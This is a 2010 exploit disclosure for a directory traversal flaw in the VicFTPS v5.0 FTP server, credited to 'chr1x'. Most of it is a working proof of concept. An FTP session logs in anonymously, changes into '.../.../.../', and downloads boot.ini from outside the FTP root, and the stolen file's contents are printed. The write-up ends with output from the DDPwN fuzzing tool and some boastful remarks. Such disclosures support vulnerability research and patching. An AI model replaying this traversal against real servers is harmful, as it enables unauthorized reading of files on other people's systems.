################################################################################
#
# +------------------------------------------------------------------------+
# | .......|
# | ..''xxxxxxxxxxxxxxx'...|
# |..'xxxxxxxxxxxxxxxxxxxxxxxxxxx..|
# | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |
# | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |
# | .'xxxxxxxxxxxxxxxxxxxxx''........... |
# |.xxxxxxxxxxxxxxxxxx'... .........'. |
# | 'xxxxxxxxxxxxxxx'......'.|
# |'xxxxxxxxxxxxxx'..'x...x. |
# | .xxxxxxxxxxxx'...'..... .' |
# | 'xxxxxxxxx'......x.|
# | xxxxxxx'...x.|
# | xxxx'.....xx.|
# | 'x'....'xxxxxxx'. x .x.|
# | .x'. .'xxxxxxxxxxxxxx. '' .' |
# |.xx..'xxxxxxxxxxxxxxxx. .'xx'''..'|
# | .xx..'xxxxxxxxxxxxxxxx'.'xxxxxxxxx''.|
# |.'xx'..'xxxxxxxxxxxxxxx...'xxxxxxxxxxxx'|
# |.xxx'..xxxxxxxxxxxx'..'xxxxxxxxxxxxxx'. |
# |.xxxx'.'xxxxxxxxx'.xxx'xxxxxxxxxx'. |
# |.'xxxxxxx'.......xxxxxxx'.|
# | ..'xxxxx'.. ..xxxxx'.. |
# |....'xx'.....''''...|
# ||
# |CubilFelino Security Research Labs|
# |proudly presents... |
# +------------------------------------------------------------------------+
#
# VicFTPS v5.0 Directory Traversal
#
#
# Greets: l1l1th, hkm, nitr0us, alt3kx, r1l0, b0rr3x, w01f, ax0us
# gh0st, CHiP, Jorge Mieres and ygjb.
#
################################################################################
# Exploit Title: VicFTPS v5.0 Directory Traversal
# Date: May 05, 2010
# Author: chr1x
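# Description: VicFTPS is a simple FTP server for Windows. Does not require an install. Very simple to configure. Supports only one user connection at a time. Supports active and passive mode transfers, MDTM, SIZE, and PASS. Version 5.0 fixed the CWD buffer overflow vulnerability. <- A new vuln here! :D
# The new issue is a directory traversal in CWD: as the confirmation below shows, "..." path components are accepted (250) and PWD then reports "/../../", so the resolved path is apparently not confined to the FTP root and a file outside it (boot.ini) can be downloaded.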
# Version: 5.0
# Tested on: Windows XP SP3 (Spanish Edition)
#########<VULN CONFIRMATION>#########################################
root@olovely:/ddpwn# ftp
ftp> open
(to) 192.168.1.64
Connected to 192.168.1.64.
220 VicFTPS ready
Name (192.168.1.64:ninja): anonymous
331 pretend login accepted
Password:
230 fake user logged in
Remote system type is WIN32.
ftp> ascii
200 Type set to I
ftp> cd .../.../.../
250 CWD command successful
ftp> pwd
257 "/../../"
ftp> get boot.ini
local: boot.ini remote: boot.ini
200 PORT command successful
150 Opening BINARY mode data connection
226 Transfer Complete
211 bytes received in 0.00 secs (92.1 kB/s)
ftp> bye
221 goodbye
root@olovely:/ddpwn# cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
root@olovely:/ddpwn#
#########</VULN CONFIRMATION>#########################################
Shot from DDPwNv1.0
[*] Testing Path: .../.../.../<- VULNERABLE! :P
Thiz v00d00 t00l just r0x! Ninjutzu automated hacking babe! lol.
http://chr1x.sectester.net